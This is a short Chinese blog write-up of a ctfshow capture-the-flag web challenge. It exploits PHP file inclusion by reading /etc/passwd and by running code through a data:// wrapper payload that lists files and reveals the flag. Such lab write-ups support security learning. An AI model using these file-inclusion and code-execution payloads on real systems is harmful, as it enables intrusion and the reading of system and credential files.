CTF_ctfshow更简单的web题

打开靶机,发现为文件包含,变量为url

直接先试一下能不能读取到靶机的文件url=/etc/passwd

 发现可以读

文件包含用五种常用的php为协议:

 (47条消息) 五种常见的php伪协议_浪_zi的博客-CSDN博客_php伪协议

这位师傅的博客中讲的很清楚,可以去看看

我们这里用的是data://text/plain,<?php ?>伪协议

1、直接执行php代码,查看当前目录下有哪些文件,构造payload

url=data://text/plain,<?php print_r(glob("*"));?>

发现当前目录下有ctf_go_go_go文件

前面可以读/etc/passwd

故直接查看文件

url=ctf_go_go_go

 

ctfshow{9d8a9a64-e94b-4d3f-929b-9e484a4de2eb}

解释:

url=data://text/plain,<?php print_r(glob("*"));?>

<?php print_r(glob("*"))?>

print_r(glob("*")):利用通配符*,读取当前文件下的所有文件,并打印出来

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值